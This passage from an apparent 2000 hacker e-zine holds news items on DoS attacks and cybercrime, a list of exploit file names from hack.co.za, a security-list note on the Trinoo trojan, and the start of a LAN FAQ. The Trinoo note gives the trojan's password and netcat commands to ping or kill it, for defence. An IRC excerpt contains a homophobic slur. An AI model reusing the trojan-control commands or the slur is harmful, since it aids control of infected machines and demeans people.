      [13:09] <nf0-man> ????????? and ???????? get shourouts in HWA
      
      <NOTE: We try and remain unbiased towards people unless blatantly
      <      attacked ourselves, we give greets to people that have helped
      <      us in the past or even just hang in the channel and have fun 
      <      chats with ...we don't take sides in 'channel wars' etc, when
      <      avoidable. - ed
      
      [13:09] <nf0-man> shoutouts rather
      [13:09] <slashh> hrmm....
      [13:09] <slashh> cruci ?!
      [13:09] <nf0-man> I'm going to write something for HNN
      [13:09] <nf0-man> about all this bullshit
      [13:10] <slashh> aaight
      [13:10] <slashh> w0rd
      [13:10] <misteri0> wargames, as in i'm-gonna-take-over-your-channel-and
                         -open-up-a-cable-and-smurf-all-your-bots?
      [13:10] <nf0-man> about all these stupid reporters that turn faggots like
                        ???????? and these DoS kids into media whores
      [13:10] <nf0-man> I cant stand it... I believe solomly in the term 
                        "underground"
      [13:10] <nf0-man> attention leads to being wanted and your damn rite if
                        'they' want to find you they will...
      [13:11] <nf0-man> people don't seem to understand that, the government can
                        do whatever they want
      [13:11] <slashh> no messing with the FBI
      [13:11] <nf0-man> no messing with the rcmp
      [13:11] <slashh> rcmp ?
      [13:11] <nf0-man> royal canadian mounted police
      <Cruciphux> Canadian version of the 'FBI'
      [13:12] <slashh> shit...
      [13:12] <nf0-man> yah
      [13:12] <nf0-man> i was just about to say that
      [13:12] <nf0-man> cruciphux is awake?
      [13:12] <slashh> yeah
      <Cruciphux> yeah :)
      <Cruciphux> hi
      [13:12] <nf0-man> word, sup?
      [13:12] <slashh> I need a smoke after this
      [13:12] <slashh> :)
      [13:13] <nf0-man> HWA > *
      [13:13] <nf0-man> besides BoW
      [13:13] <slashh> shit I can handle in one day
      [13:13] <nf0-man> no offense
      <Cruciphux> BoW haha
      <Cruciphux> they rock
      [13:13] <slashh> BoW ?!
      [13:13] <nf0-man> yep
      [13:13] <slashh> whats that ?
      [13:13] <nf0-man> a fellow canadian has been screwed by the us/ca government
      [13:13] <nf0-man> tr0ut
      [13:13] <slashh> :(
      [13:14] <nf0-man> i live pretty close to him too
      
      <SNIP>
      
      End of relevant convo.
      
      <session ends>
      
      
      @HWA
      

15.0  Microsoft cancels tournament after cybercrime.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Contributed by Xistence
      
      17 February 2000
      
      http://www.webwereld.nl/nieuws/dysta/3790.phtml (DUTCH)
      
      Microsoft cancels tournament after cybercrime.
      
      The Dutch introduction of Windows 2000 should go with a 
      internettournament, that was the idea of Microsoft. Participants could 
      via Windows 2000 Challenge do a search and puzzletour on the net. The 
      Project was cancelled  a few hours after the start on wednesday.
      
      Microsoft was a victim of a Denial-of-Service attack (DoS). Last week
      lots of American sites where attacked the same way. They started 
      attacking the Microsoft servers at wednesday morning. MS tried to 
      transfer the game to other servers, but it didn't help.
      
      The servers could handle 100.000 visitors at one time, but couldn't
      handle the fake requests of the internetcriminals.
      That's why the server wasn't reachable by the serious visitors. As
      usual with DoS atacks there isn't broken in to the servers.
      
      Microsoft decided to cancel the Challenge, becase the game was joined
      to the moment of worldwide launch of Windows 2000.
      All participants have received information about it. The pricemoney of
      20.000 Euro will be given to the "Young Minds in Motion" foundation 
      which is set up by Bill Gates.
      
      Microsoft will try to catch the criminals. Michiel Gosens of Microsoft
      says: "We are finding out how to catch the criminals.
      We are very disappointed about this action.
      
      @HWA
      
      
16.0  Microsoft on 'Open Windows': Baloney!
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by SugarKing
       
      Company denies report quoting Gates as ready to open source code to settle
      antitrust suit.
      
      Source: ZDNet
      url: http://www.zdnet.com/zdnn/stories/news/0,4586,2440749,00.html?chkpt=zdhpnews01
       
      
      When Bill Gates talks, reporters scurry.
      
      Do they ever.
      
      Microsoft's ever-in-the-news chairman was again the object of attention 
      Thursday afternoon.

      Not because of the introduction earlier in the day of Windows 2000, the 
      anticipated upgrade to the company's powerful network operating system.

      Rather, Gates was quoted as saying that Microsoft (Nasdaq: MSFT) was ready 
      to compromise on a key issue and settle its antitrust lawsuit with the 
      government.

      In an interview with Bloomberg Television on Thursday, Gates was quoted as 
      saying the software giant would be willing to open to competitors the 
      source code to its Windows operating system, its flagship product, to 
      settle the lawsuit brought by the U.S. Justice Department. (See: 
      Settlement? Microsoft may open its code)

      Or was he?

      'Bill did not comment ...'       "Bill did not comment in any way on the 
      mediation process or any settlement proposals," said company spokesman Jim 
      Cullinan.

      Meanwhile, the news wires crackled as observers attempted to deconstruct 
      his statement. The only point that was clear was that nobody outside of 
      Microsoft's chairman really knew whether it signaled a break in the legal 
      logjam.

      "Just because he says he's interested doesn't indicate he's ready to make 
      a deal," said Stephen Houck, a New York antitrust lawyer who was the lead 
      counsel for the 19 states during the course of the Microsoft antitrust 
      trial. "Making the source code available has a lot of theoretical appeal. 
      But they would have to do a lot of work to make sure it's a viable package 
      that would interest potential competitors."

      Last May, company President Steve Ballmer (who's now also CEO) said 
      Microsoft had not ruled out making at least part of the Windows source 
      code available for the public domain. At the time, Microsoft was under 
      pressure to react to the growing momentum of Linux.

      But there's been no movement on that count since then.

      As a rule, company executives have strenuously resisted suggestions that 
      Microsoft should put what are the essentially its crown jewels into the 
      public domain.

      Final arguments coming in D.C.       The latest flurry occurred less than 
      a week before Microsoft and the government are set to present final 
      arguments before U.S. District Judge Thomas Penfield Jackson in 
      Washington, D.C. The two sides have been meeting separately with a 
      court-appointed mediator, U.S. Circuit Judge Richard Posner.

      Neither Microsoft nor the government has commented on the substance of the
      talks. But sources familiar with the deliberations say the negotiations have
      gone slowly and that Posner has remained unable to bridge the gap between 
      the sides.
      
      @HWA
      
      
      
17.0  Defending privacy and law enforcement
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by SugarKing
      
      Source: CS Monitor
      url: http://www.csmonitor.com/durable/2000/02/17/p13s1.htm
      
      
      It took less than 24 hours for the FBI to track an e-mail message in 
      December from the inbox of a Columbine High School student in Colorado to 
      its source on the computer of a Florida teenager.

      Just one search warrant allowed law enforcement to lift the thin veil of 
      anonymity - in this case, the name Soup81 - from the e-mail address that 
      shielded Michael Ian Campbell. Mr. Campbell's message to 16-year-old Erin 
      Walter threatening to finish the deadly rampage begun by two high school 
      seniors at Columbine last April, shut down the high school for two days. 
      Campbell has said he was only joking.

      But the ability of law enforcement to reach behind pseudonyms and unmask 
      computer criminals is no laughing matter. The Internet has become a 
      welcoming host to a vast array of crimes, from terrorism to stock fraud to 
      stalking, luring perpetrators with the apparent ease of online anonymity.

      Law enforcement is struggling to catch up to the latest computer 
      technology, scrambling to develop the knowledge and capability to crack 
      even the most sophisticated cybercrimes. Meanwhile, their fancy detective 
      work is making the defenders of civil liberties nervous, as they envision 
      such snooping technology being used to monitor people's private lives.

      For many, the attraction of the Internet is the ability to speak one's 
      mind with anonymity. E-mail, chat rooms, message boards, and listservs 
      allow users to spread their messages without fear of repercussion. But 
      Martha Stansell-Gamm, chief of the Computer Crimes and Intellectual 
      Property Section at the Department of Justice, says the government is 
      seeing an enormous increase in computer crimes, as Internet use roughly 
      doubles each year. "It can be very difficult to attribute particular 
      conduct to a particular person," she says.

      Local law enforcement is similarly stymied. "The technology the bad guys 
      have seems to be in advance of what the police have," says Bob Wallace, 
      spokesman for the National Association of Chiefs of Police.

      Barbera Moser, an FBI agent in Miami, says federal agents are desperately 
      trying to catch up. "We're not used to dealing with an electronic medium. 
      We have too many officers out there who didn't grow up with this stuff."

      There are all sorts of ways for computer criminals to hide their tracks, 
      from spoof headers to anonymous remailers to multiple layers of 
      encryption. But most messages have some sort of return address, which is 
      how computers communicate.

      Usually, law enforcement can trace back along the chain of addresses to an 
      Internet service provider that, if served with a warrant, will turn over 
      information that identifies the source of the message. "If there's any way 
      for us, we're going to find it," says Ms. Stansell-Gamm, who adds that the 
      Justice Department is engaged in a massive effort to educate prosecutors 
      nationwide about the latest computer technology.

      But defenders of privacy and civil liberties fear that increasingly 
      sophisticated means for tracing messages may mean the end of anonymity on 
      the Internet. "I think this is going to be one of the big battles that's 
      fought over the next years," says David Sobel, general counsel for the 
      Electronic Privacy Information Center, a nonprofit research group.

      At the heart of the battle is the First Amendment, which the Supreme Court 
      has said protects anonymous speech. In 1995, the Supreme Court in McIntyre 
      v. Ohio Elections Commission struck down an Ohio law that required 
      identification of the authors of anonymous leaflets, noting that anonymous 
      messages "have played an important role in the progress of mankind."

      Both sides in the debate acknowledge that there is a palpable tension 
      between developing the technological means to trace Internet lawbreakers 
      and maintaining the right of legitimate, anonymous speech.

      Says Saunders: "I don't want a Big Brother state, but I also don't want to 
      see innocent victims getting killed."
      
      
      @HWA
      
      
18.0  Cyber Safe or Gov't Surveillance? 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by SugarKing
      
      Source: Wired
      url: http://www.wired.com/news/politics/0,1283,34027,00.html
      
      
      WASHINGTON -- A government plan to monitor networks for intrusions goes 
      too far and will lead to increased surveillance and privacy violations, a 
      civil liberties group told a Senate panel on Tuesday. 

      The Electronic Privacy Information Center said a memo it obtained last 
      week shows that the Clinton administration's FIDNET proposal for 
      "information systems protection" will result in unwarranted spying on 
      Americans. 

      Documents the group received through a Freedom of Information Act request 
      indicate the administration is considering broad access to credit card and 
      phone records of private citizens and monitoring of government workers' 
      computers, EPIC director Marc Rotenberg told the Senate judiciary 
      subcommittee on technology and terrorism. 

      "The FIDNET proposal, as currently conceived, must simply be withdrawn. It 
      is impermissible in the United States to give a federal agency such 
      extensive surveillance authority," Rotenberg told the panel chaired by Jon 
      Kyl, an Arizona Republican. 

      The privacy problems of FIDNET and similar government efforts are 
      exaggerated, said Critical Infrastructure Assurance Office director John 
      Tritak. 

      "FIDNET is intended to protect information on critical, civilian 
      government computer systems, including that provided by private citizens. 
      It will not monitor or be wired into private sector computers," Tritak 
      said. "All aspects of the FIDNET will be fully consistent with all laws 
      protecting the civil liberties and privacy rights of Americans." 

      Tritak showed up to discuss the so-called "National Plan for Information 
      Systems Protection, Version 1.0," which the government released in 
      January. It calls for additional government spending to thwart a "highly 
      organized, systematic cyberattack by hostile powers or terrorist 
      organizations." 

      The 199-page plan includes a chapter titled "protecting privacy and civil 
      liberties." The chapter calls for an annual "public-private colloquium" 
      and review of privacy practices by "appropriate authorities." 

      But it does not say the CIAO will reveal even summaries of its activities 
      -- the sort of regular review required of federal prosecutors who ask for 
      wiretaps of phone lines. "Nowhere does the Plan answer such questions as 
      what formal reporting requirements will be established, what independent 
      review will be conducted, and what mechanisms for public accountability 
      and government oversight will be put in place," EPIC's Rotenberg said. 

      Also testifying was Frank Cilluffo, deputy director of the organized crime 
      project at the Center for Strategic & International Studies. CSIS has 
      close ties to the military, and last month appointed soon-to-be former 
      deputy secretary of defense John Hamre as its president and CEO. 

      Cilluffo sided with CIAO: "Throughout history, the first obligation of the 
      state has been to protect its citizens. Today is no exception." 

      "Overall, I think the [CIAO] plan does an excellent job identifying gaps 
      and shortfalls within the federal government, and charting an initial 
      course of action to address them. My major concern is that it does not do 
      enough," Ciluffo said. 

      FIDNET, the part of the overall CIAO plan aimed at detecting intrusions 
      into federal computers, came under fire last summer. Civil liberties 
      groups and some legislators warned it could be too intrusive and could 
      monitor the private-sector Internet. 

      The Justice Department didn't help matters by replying last September in a 
      letter that said FIDNET would not -- at least, as currently "envisioned." 

      During the hearing Tuesday, CIAO's Tritak echoed what other law 
      enforcement representatives have said: "One person with a computer, a 
      modem, and a telephone line anywhere in the world can potentially break 
      into sensitive government files, shut down an airport's air traffic 
      control system, or disrupt 911 services for an entire community." 

      A top FBI official said the same thing in January, warning that electric 
      power is vulnerable to miscreant hackers. But a person close to the North 
      American Electric Reliability Council -- a trade association of electric 
      power generating companies -- told Wired News that he wasn't aware of any 
      power control computers hooked up to telephone lines or the Internet. 
      
      @HWA
      
      
19.0  First Win2000 Fix Out 
      ~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by SugarKing
      
      Source: Wired
      url: http://www.wired.com/news/technology/0,1282,34452,00.html

      Just one day after trumpeting Windows 2000 as the solution for business, 
      Microsoft issued its first update to the OS that adds compatibility with 
      45 popular games. 

      The compatibility update also includes one hardware fix, adding support 
      for Iomega Zip drives connected to the parallel port. 

      Company officials said the patch will help Windows 2000 work better with 
      applications. Microsofts own FrontPage 98, a Web page building 
      application, is on the list of programs that are helped by the patch. But 
      the bulk of the list is mostly games, such as Creature 3, F22 Lightning 
      III, and Mageslayer. 

      A Microsoft spokesman said the company was focused on Windows 2000 
      compatibility with top business applications up until now. But with two 
      months of extensive beta testing behind the product, Microsoft was able to 
      expand testing to consumer titles. 

      That is important, since even though Windows 2000 targets business users, 
      Microsoft officials said they expect it will also make its way into in the 
      hands of home users. 

      One analyst said it's not surprising. 

      "It's very difficult to have an OS that won't exist in both places if it's 
      on a PC, because the equipment exists in both the home and workplace," 
      said Rob Enderle, senior analyst with the Giga Information Group. "Some 
      people who use it at work also want to use the same OS at home. This is 
      not an uncommon situation." 

      Microsoft gave no schedule for future compatibility releases. Windows 2000 
      still has a number of acknowledged application incompatibilities, 
      including AOL 4.0 and early versions of Microsofts own MSN portal. 

      @HWA
      
      
20.0  Boy, 14, charged with hacking
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by SugarKing
      
      Source: St. Petersburg Times
      url: http://www.stpetersburgtimes.com/News/021800/Citrus/Boy__14__charged_with.shtml
      
      
      Authorities say he got into a server at Crystal River High School that 
      contained teacher files, including students' grades. But they say he 
      didn't change anything or damage the school's system. 

      CRYSTAL RIVER -- Jacy Kyle Johnson sometimes bragged to his friends that 
      he could crack the school computer system and change his grades. 

      He is accused of doing a little more than boast. 

      Johnson, 14, is charged with hacking his way into teacher grading files 
      almost two weeks ago from a computer in the Crystal River High School 
      library. School officials say they don't think he changed his or anyone 
      else's grade, but he may have penetrated at least two protective software 
      layers in the computer called firewalls, which are designed to prevent 
      such intrusions. 

      "The first thing we did is call in our district technical support people," 
      Crystal River principal Craig Marlett said Thursday. "They're pretty 
      confident he didn't change his grades. He was on his way, but didn't get 
      quite into it." 

      Johnson was in juvenile court Thursday, where he faced a charge of 
      accessing a computer network without authorization of the network owner -- 
      computer hacking -- stemming from his Feb. 7 arrest. He also faced three 
      other charges related to alleged assaults on his mother and was ordered 
      held at a juvenile detention center in Ocala for up to 15 days while 
      officials determine what to do with him. 

      Keith Schenck, staff attorney for the Circuit Court judges in Citrus 
      County, said it is rare that someone has been charged with such an offense 
      in this county. 

      "This may be the first one," he said. 

      However, the law under which Johnson is charged actually was created in 
      1978, he said. 

      The teen was found out after another student witnessed Johnson using a 
      library computer to tap into school records and told a teacher. The 
      teacher saw Johnson walk away in a hurry from the computer and checked it 
      out, said Jeffery Smith, the assistant state attorney who handles juvenile 
      offenders. 

      A school resource officer investigated the incident. He learned from 
      school staff that Johnson had bragged about breaking into the school 
      computer. Staff members also told him students were talking about paying 
      Johnson to change their grades. 

      From the library computer, Johnson gained access to the computer server 
      for authorized personnel. From there, he was able to look at teachers' 
      files that include past and current grades, according to the school 
      resource officer's report. 

      The officer, Deputy Ron Frink, said a school district technology 
      specialist told him Johnson was in an area that took two security password 
      clearances to penetrate. 

      Smith said the boy confessed. He also said it doesn't appear that Johnson 
      actually changed any grades. 

      "I have no indication that there was anything other than him bragging 
      happening," Smith said. 

      The computer hacking charge is a third-degree felony, and Johnson would 
      have faced as many as five years in prison if convicted as an adult. Had 
      he actually changed his grades, the charge would have been upgraded to a 
      second-degree felony, which carries a prison term of up to 15 years. 

      Because he is charged as a juvenile, he faces a more limited penalty, 
      which could include counseling. 
      
      @HWA
      

21.0 Defense Agency plans cyber-terrorism unit 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Contributed by SugarKing	

     Source: The Daily Yomiuri
     url: http://www.yomiuri.co.jp/newse/0218cr06.htm
     
     NAHA -- The Defense Agency is planning to establish a unit in the 
     Self-Defense Forces dedicated to combating hacking against key computer 
     systems, as part of the five-year defense buildup program beginning in 
     fiscal 2001, Ken Sato, administrative vice minister of the agency, said 
     Thursday. 

     "We recognize that studying how to defend against cyber-terrorism as part 
     of an intelligence war is a major challenge we face," Sato told a news 
     conference at the SDF Naha Base in Okinawa Prefecture. 

     "We would like to create an organization to conduct comprehensive research, 
     and a combat unit to deal with attacks (by hackers)." 

     Cyber-terrorism includes the destruction or incapacitation of computer 
     systems by hackers infiltrating networks through telephone lines. 

     Pressure has been growing on the government to take swift action to better 
     prepare the nation against cyber-terrorism since hackers invaded central 
     government Web sites earlier this year. 

     The agency has requested about 2.7 billion yen in the fiscal 2000 budget 
     for computer system crisis management. 

     The allocation is seen as a precursor to the establishment of a research 
     institute and a cyber-terrorism combat unit in the next defense buildup 
     program, Sato said. 

     The specifics of the organization and unit have yet to be worked out, but 
     they are expected to work in close cooperation--similar to the way in which 
     the Ground Self-Defense Force's chemical school and defense unit operate. 


      @HWA


22.0  HACK,CO.ZA is back online.
      ~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by gov-boi and Cruciphux
      
      
      As of Feb 22nd (or there abouts) http://www.hack.co.za/
      re-opened its doors and came back online with an updated
      site.
      
      The site had previously been offline due to a series of
      heavy DoS attacks which caused the main ISP to cut service
      to the site in order to maintain network integrity, The
      site was mirrored elsewhere during this time.
      
      gov-boi may be reached at: camis@qttech.co.za
      
      
      Public files added recently to the site: *The '0-day' 
      area still exists. You must send an unreleased overflow
      or exploit to gov-boi in order to access this private
      passworded section. Access remains for 14 days or until
      you submit another exploit/overflow for the collection,
      this ensures a fresh supply of files. - Ed
      
      [[ 25 Feb ]]-
      Added nispasswd.c Solaris 2.5.1 local overflow.
      Added flexlm.sh Solaris (x86/7.0/2.6) local exploit.
      Added l-amd.tgz RPC remote overflow by lamagra.
      Added xdestroy.c Xwin dos exploit by blasphemy.
      Added slzbserv.c WinNT remote overflow by | Zan.
      Added inetserv-exp.c WinNT remote overflow by dr_fdisk^.

      -[[ 23 Feb ]]-
      Added apcd.sh Debian 2.1 local exploit.
      Added instructor.c OpenBSD 2.5 DoS attack.
      Added shellgen_exp.c Linux/Misc local overflow.
      Added ADMsximap.c Solaris x86 remote overflow.
      Added linux.2.2.x.icmp.dos.c Redhat 6.0 DoS attack.
      Added vchkpw.c FreeBSD 3.4 remote overflow by K2.
      Added procfs.c FreeBSD 3.3 local overflow by Nergal.
      Added uw-ppptalk.c Unixware 7.1 local overflow by K2.
      Added asmon.sh FreeBSD (3.4, 3.3, 3.2, 3.1, 3.0) local exploit.
      Added cfing.c Fingerd 1.3.3 remove bsd overflow by babcia.
      Added proftp-ppc.c ProFTP pre(1-6) remove overflow by lamagra.  
      
      
      
      @HWA
      
22.1  Hack.co.za appears to be offline again (Mar 11th)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      On attempting to access the site last evening the site for
      Online Anarchy came up which appeared to be a clan-gaming
      site, and not a hack or defacement.
      
      By appearances it looked like a DNS reroute or NS screwup
      no further info is available and the site may be back online
      by the time you read this. - Ed
      
      @HWA      

23.0  Dangerous Hacking Agent (Troj_Trinoo) Discovered (2 pcs)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Sourced from: http://www.pure-security.net/
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Daily News
      Dangerous Hacking Agent
      Discovered
      By Dick Kelsey, Newsbytes.
      February 23, 2000

      Another, more dangerous Trojan "in the wild" agent can stage
      deliberate denial of service (DDoS) attacks on Windows
      environments, Trend Micro Inc., said today.

      "We've discovered a new agent," Trend Micro Public Education
      Director David Perry told Newsbytes. "Rather than targeting
      Solaris boxes, it targets Windows NT, 95 and 98." The agent,
      identified aS TROJ_TRINOO, gives hackers access to a
      network through a vulnerable point on a computer within the
      system.

      Perry said Solaris has great security and is operated by a
      top-notch staff. "Yet they were broken into and used for this
      attack, which points to the fact that this (a spate of DDoS
      attacks 2 weeks ago) was not done by a 15-year-old kid," he
      said. "Someone had to go in and figure out which ports were
      vulnerable, then hack into the site. This took someone with
      hacking skills."

      TrendMicro, which makes centrally controlled server-based
      virus protection and content-filtering products, said
      TROJ_TRINOO has been seen in the wild but is not believed to
      have carried out any mass attacks. The agent zeroes in on
      users with cable modems or digital subscriber lines (DSL).

      Perry said users can scan their systems at the company's site,
      http://housecall.antivirus.com , for so-called "sleeper agents," a
      reference to US troops taken prisoner during the Korean War
      and brainwashed to become unwitting agents for the enemy. "If
      you are a sleeper, you want to remove it, then let your ISP
      (Internet service provider) know what happens," Perry said.

      Two weeks ago today Yahoo was brought down by a DDoS
      attack, followed by other, less debilitating attacks on eBay,
      Excite and several other major sites.

      Trend Micro can be found on the Web at
      http://www.trendmicro.com .   Reported by Newsbytes.com
      
      -=-
      
      
      Further information from Simple Nomad:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: WinNT2kSecurity list
      
      From: Simple Nomad <thegnome@NMRC.ORG>
      To: <win2ksecadvice@LISTSERV.NTSECURITY.NET>
      Sent: Sunday, February 27, 2000 12:51 AM
      Subject: Troj_Trinoo and ZZ
      
      
      RAZOR has acquired a copy of the Trojan Trinoo. Here is a bit of
      information about it. Sorry this isn't in official "advisory" style of
      writing, but I really wanted to get this info out quickly.
       
      The trojan is called service.exe, but could be renamed. It is 23145 bytes
      in length. To remove it you must kill in in memory, remove its entry at
      HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run, and
      delete the file from the hard drive. Make sure you delete the correct
      file, and not services.exe.
      
      It listens on udp port 34555, and will respond to pings on udp port 35555.
      The password is "[]..Ks" (without the quotes). Therefore the following
      will detect it:
       
       Set up a netcat listener:
            nc -u -n -l -p 35555 -v -w 100
       
       Send a trinoo ping:
            echo 'png []..Ks l44' | nc -u -n -v -w 3 192.168.1.5 34555
       
      The listener will display PONG if a trinoo daemon is listening.
       
       This will kill it:
            echo 'd1e []..Ks l44' | nc -u -n -v -w 3 192.168.1.5 34555
       
      After it is killed, the udp port may still be bound until a reboot, at
      least on Windows 95/98. Subsequent trinoo pings will return an ICMP
      destination unreachable/port unreachable if it is down.
       
      I've updated the unix version of Zombie Zapper to reflect this. You can
      download it from http://razor.bindview.com/tools/ZombieZapper_form.shtml,
      look for the Unix version 1.1 with Trinoo Trojan support near the bottom
      of the page. Hopefully we'll have a Windows NT version available sometime
      Monday.
       
      Both Seth McGann and Todd Sabin of RAZOR contributed heavily to the info
      above after disassembling the trojan. And special thanks to Gary Flynn at
      James Madison University for supplying RAZOR with a sample for testing.
       
       -         Simple Nomad          -  No rest for the Wicca'd  -
       -      thegnome@nmrc.org        -        www.nmrc.org       -
       -  thegnome@razor.bindview.com  -     razor.bindview.com    -
       
       _____________________________________________________________________
       ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
       ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
       SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
      
      
      @HWA
      
      
24.0  Tech info: The BIG-LAN FAQ.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Helpful info for administrating (or hacking) your school or other
      larger networks.
      
      (From a usenet post by YMEY)


      BIG-LAN Frequently Asked Questions
      
      Last Updated: July 24, 1995
      
      Acknowledgements: A lot of people provided information for me and I
      freely admit that I have not recorded the list of names.  Thanks
      to all.
      
      Contents
      --------
      I. About BIG-LAN
      II. Explanation of this Memo
      III. Sources of Information on Campus Networks
        1. Must-Read Sources
        2. A Few General Sources
        3. LISTSERV Mailing Lists
        4. Internet Mailing Lists
        5. Internet Mailing Lists with automatic subscription
        6. USENET/Netnews Groups
        7. Anonymous FTP-based Archive Sites
        8. LISTSERV-based Archive Sites
        9. RFCs (Internet "Request For Comments")
        10. Other Useful Online Papers
        11. Sources of Protocol Documents
        12. Useful Free Software
        13. Books
        14. Periodicals
        15. Training Courses
        16. Conferences
      IV. Basic Glossary on Campus Networks
      V. Frequently Asked Questions on Campus Networks
        1. What is the difference between Ethernet and IEEE 802.3?
        2. What is encapsulation?  What do I have to know about it?
        3. How do I know whether to use a router or a bridge?
        4. How do I know whether to use a bridge or a repeater?  How many
           repeaters may I put on an Ethernet?
        5. Should I use "manageable" hubs, concentrators, etc on my LAN?
        6. Which LAN technology should I use?  Arcnet?  FDDI?  Token Ring?
           10BASE-T?
        7. What is the ideal cable to install in a new building?
        8. What is the ideal cable to install between buildings on a campus?
        9. Whose routers are recommended?
        10. Whose bridges are recommended?
        11. Whose Ethernet equipment are recommended?
        12. Whose Token Ring equipment are recommended?
        13. Whose FDDI equipment are recommended?
        14. What PC network software is recommended?
        15. What protocols should run on a campus-wide LAN?
        16. What software is recommended for managing a campus-wide LAN?
        17. What terminal server is recommended?
        18. Whose troubleshooting equipment are recommended?
        19. What security products should I buy?
        20. Should the names of devices on my campus LAN have subdomains?
        21. Should client stations use POP?  Should they use just SMTP?
            Should I use some non-TCP/IP protocol for mail to/from client
            stations?
        22. Should I enable SQE/heartbeat?
        23. If I have a thinwire network interface card, how do I connect it
            to a 10BASE-T concentrator?
        24. How much does a collision slow down an Ethernet packet?
        25. Should I worry about Ethernet tailgating?
      
      I. About BIG-LAN
      
         BIG-LAN is a mailing list for discussion of issues in designing and
         operating Campus-Size Local Area Networks, especially complex
         nes utilizing multiple technologies and supporting multiple
         protocols.  Topics include repeaters, bridges, routers and
         gateways; how to incorporate smaller Personal-Computer type LANs
         into the campus-wide LAN; how to unify the mail systems, etc.
         This is an ideal list in which to debate the relative merits of
         bridges vs routers.
      
         All requests to be added to or deleted from this list, problems,
         questions, etc., should be sent to big-lan-request@listserv.syr.edu.
         Those familiar with LISTSERV can subscribe with
         listserv@listserv.syr.edu.
      
         Archives are available through listserv@listserv.syr.edu and
         ftp://syr.edu/information/archives/big-lan/
      
         Coordinator: John Wobus <jmwobus@syr.edu>
      
      II. Explanation of this Memo
      
           Since BIG-LAN is not specific to any protocol family, it will
           not cover any particular protocol family in detail, e.g.  this
           is not a TCP/IP/Internet FAQ Memo.  Fortunately, there are some
           good TCP/IP FAQ Memos which are listed in the sources of
           information below.
      
           Suggestions, corrections, and contributions welcome.  Please
           send them to:
      
                      jmwobus@syr.edu
      
           An up-to-date copy of this memo may be retrieved via URL:
      
                http://web.syr.edu/~jmwobus/comfaqs/big-lan.faq
      
      III. Sources of Information on Campus Networks
      
           This list favors "network" sources of information: available on
           the Internet and/or BITNET and other similar networks; if you
           have access to BIG-LAN then you have access to one of these
           networks; and these sources are not the kind which you can
           discover through vendors, books, bookstores, or libraries.
      
        1. Must-Read Sources
      
            These are documents that you definitely should get and read if you
            have questions about Campus Networks.
      
          a. Charles Spurgeon's reading list (see below under "Other Useful
              Online Papers").
          b. RFCs 1175, 1594, 1207, and 1392 (see below under "RFCs").
      
        2. A Few General Sources
      
           These are network resources & mechanisms for getting all kinds
           of information--not just on Networking; thus we can't cover them
           very thoroughly in this memo.
      
          a. LISTSERV - mailing list servers & file servers on BITNET,
              accessible via e-mail.  Can be reached and used from a lot of
              networks.  Mail the command INFO to any LISTSERV for help.
              Also have database commands (i.e. search commands) for archives
              they store.
          b. Usenet News/Netnews: distributed bulletin board with discussions
              on lots of topics.  Distributed through the Internet and through
              UUCP.
          c. Anonymous ftp: the main way to make files available on the
              Internet.  ftp to a site using username "anonymous".  A
              password is always demanded--sometimes a banner tells you what
              to use--otherwise "guest" almost always works.
          d. Archie servers - network-accessible databases of where to get
              files via anonymous ftp.  Access is through telnet, rlogin,
              mail, or a special "archie" protocol.  To use via telnet,
              enter username archie.  Some servers: archie.ans.net,
              archie.sura.net, archie.mcgill.edu, archie.unl.edu.
          e. WAIS - Internet-accessible databases on different topics.
              Available via WAIS protocol (basically Z39.50).  Client
              (and server) software is collected on quake.think.com as
              well as a WAIS database of WAIS servers.
          f. ftplist.txt - collected list of anonymous ftp sites.
              Stored lots of places in anonymous ftp including syr.edu.
          g. Internet gopher - something like anonymous ftp only more
              advanced:  to get started, I suggest ftping
              boombox.micro.umn.edu and getting information on gopher.  A
              number of sites have servers.
          h. Internet List of lists: available by anonymous ftp from
              ftp.nisc.sri.com, or through a mail-based file server
              at mailserver@nisc.sri.com.
          i. LISTSERV internal list of lists.  Available by mailing the
              command LIST GLOBAL to any LISTSERV.
          j. news.answers - newsgroup that distributes Frequently Asked
              Questions memos for lots of Netnews groups.
          k. FAQ archive available via anonymous ftp on rtfm.mit.edu
              From the archives of news.answers, Frequently Asked Question
              memos for lots of Netnews groups.
          l. news.announce.newusers - has periodic postings about how to
              use Usenet/Netnews and also a lot about mailing lists.
          m. BITFTP.  A BITNET server that allows BITNET sites to use the
              Internet's File Transfer Protocol to send/receive files to
              ftpable Internet sites.  For more information, send mail
              to BITFTP@PUCC with HELP as the message body.
          n. Database of lists managed by LISTSERV@VM1.NODAK.EDU.  Use through
              LISTSERV's database interface.
          o. Maas files--Indexes & abstracts about various services available
              via Internet & BITNET including some related to campus networks.
              Available via anonymous ftp from ftp.unt.edu.
          p. NETSCOUT@VMTECMEX.BITNET mailing list.  A list to exchange
              information on the location of network resources.
              LISTSERV-based so use instructions below to subscribe, etc.
          q. World Wide Web servers.  You need WWW or Mosaic software to
              access them.  A good server to start with is www.ncsa.uiuc.edu.
              Mosaic is available from ftp.ncsa.uiuc.edu.
      
      
        3. LISTSERV Mailing Lists
      
            Send a "SUBSCRIBE" command to LISTSERV@foo, e.g.
                    SUBSCRIBE BIG-LAN John Doe
      
          a. BIG-LAN@LISTSERV.SYR.EDU
